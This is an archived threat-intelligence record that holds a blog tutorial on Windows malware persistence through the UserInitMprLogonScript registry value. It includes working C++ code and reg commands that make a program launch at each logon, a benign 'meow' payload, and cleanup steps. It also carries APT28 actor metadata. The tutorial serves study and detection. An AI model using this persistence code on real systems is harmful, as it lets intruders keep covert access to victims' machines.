{
	"id": "fa255bb5-e627-4b18-b445-33eb6bf31fd7",
	"created_at": "2026-04-06T00:17:31.034423Z",
	"updated_at": "2026-04-10T03:36:59.181691Z",
	"deleted_at": null,
	"sha1_hash": "261de8391c031ac0d2b1d0ff92f40a479f7d8deb",
	"title": "Malware development: persistence - part 20. UserInitMprLogonScript (Logon Script). Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4447357,
	"plain_text": "Malware development: persistence - part 20.\r\nUserInitMprLogonScript (Logon Script). Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-12-09 · Archived: 2026-04-05 20:33:04 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is based on my own research into one of the more interesting malware persistence tricks: persistence via the UserInitMprLogonScript value.\r\nUserInitMprLogonScript\r\nWindows can execute logon scripts whenever a user or group of users logs into a system. Adding a script’s path to the HKCU\\Environment\\UserInitMprLogonScript Registry value accomplishes this. So, to establish persistence, attackers may use Windows logon scripts, which are executed automatically during logon initialization.\r\npractical example\r\nhttps://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\r\nPage 1 of 12\r\nLet’s look at a practical example. First of all, as usual, create the “evil” application. For simplicity, as usual, it’s the meow-meow message box application ( hack.cpp ):\r\n/*\r\nhack.cpp\r\nevil app for windows persistence\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/12/09/malware-pers-20.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n  MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n  return 0;\r\n}\r\nAnd then just create the persistence script ( pers.cpp ):\r\n/*\r\npers.cpp\r\nwindows persistence via\r\nsetting UserInitMprLogonScript value\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/12/09/malware-pers-20.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n  HKEY hkey = NULL;\r\n  // registry key under HKCU that holds the logon script value\r\n  const char* env = \"Environment\";\r\n  // full path of the evil app\r\n  const char* exe = \"Z:\\\\2022-12-09-malware-pers-20\\\\hack.exe\";\r\n  // open HKCU\\Environment for writing\r\n  LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCSTR)env, 0, KEY_WRITE, \u0026hkey);\r\n  if (res == ERROR_SUCCESS) {\r\n    // update the registry value; equivalent to:\r\n    // reg add \"HKEY_CURRENT_USER\\Environment\" /v \"UserInitMprLogonScript\" /t REG_SZ /d \"...\\hack.exe\" /f\r\n    // the size passed for a REG_SZ value must include the terminating null\r\n    RegSetValueEx(hkey, (LPCSTR)\"UserInitMprLogonScript\", 0, REG_SZ, (const BYTE*)exe, (DWORD)strlen(exe) + 1);\r\n    RegCloseKey(hkey);\r\n  }\r\n  return 0;\r\n}\r\nAs you can see, the logic is simple. Just set the UserInitMprLogonScript value under HKCU\\Environment to the full path of our “malware” - Z:\\2022-12-09-malware-pers-20\\hack.exe .\r\ndemo\r\nLet’s see everything in action. First of all, check the Registry:\r\nreg query \"HKCU\\Environment\" /s\r\nThen compile our “malware” on the attacker’s machine ( kali ):\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd to check that it works, run hack.exe on the victim’s machine ( Windows 10 x64 in my case):\r\n.\\hack.exe\r\nAs you can see, our “malware” works perfectly.\r\nAt the next step, compile our persistence script on the attacker’s machine:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nAnd run it on the attacker’s machine:\r\n.\\pers.exe\r\nThen check our Registry values again:\r\nreg query \"HKCU\\Environment\" /s\r\nSo, as you can see, the UserInitMprLogonScript value is set.\r\nThat’s all. Try to log out and log in:\r\nAnd after a few milliseconds, our “malware”, meow-meow, popped up:\r\nThen, if we open Process Hacker and check the hack.exe properties:\r\nwe see that the parent process is a “non-existent” process.\r\nIf you have studied Windows internals at least a little, you know that there are processes whose parent is shown as a “non-existent” process. For example, Windows Explorer - explorer.exe . Its parent process is userinit.exe or winlogon.exe , but it can be any .exe that launches explorer.exe . The parent will show as \u003cNon-existent Process\u003e since userinit.exe terminates itself. Another example is Windows Logon - winlogon.exe . Its parent “does not exist” since smss.exe exits.\r\nIf we check the hack.exe properties via Sysinternals Process Explorer, we can see the “Autostart Location” value:\r\nEverything worked perfectly! =^..^=\r\nAfter the experiment, delete the value:\r\nRemove-ItemProperty -Path \"HKCU:\\Environment\" -Name \"UserInitMprLogonScript\"\r\nThis persistence trick is used by the APT28 group and by malware such as Attor and Zebrocy in the wild.\r\nI hope this post spreads awareness of this interesting technique to blue teamers, and adds a weapon to the red teamers’ arsenal.\r\nThis is a practical case for educational purposes only.\r\nSysinternals Process Explorer\r\nMalware persistence: part 1\r\nAPT28\r\nAttor\r\nZebrocy (Trojan)\r\nsource code in github\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html"
	],
	"report_names": [
		"malware-pers-20.html"
	],
	"threat_actors": [
		{
			"id": "a76ba723-d744-472a-b683-19d80e105d9f",
			"created_at": "2023-01-06T13:46:39.089347Z",
			"updated_at": "2026-04-10T02:00:03.209505Z",
			"deleted_at": null,
			"main_name": "Attor",
			"aliases": [],
			"source_name": "MISPGALAXY:Attor",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434651,
	"ts_updated_at": 1775792219,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.pdf",
		"text": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.txt",
		"img": "https://archive.orkl.eu/261de8391c031ac0d2b1d0ff92f40a479f7d8deb.jpg"
	}
}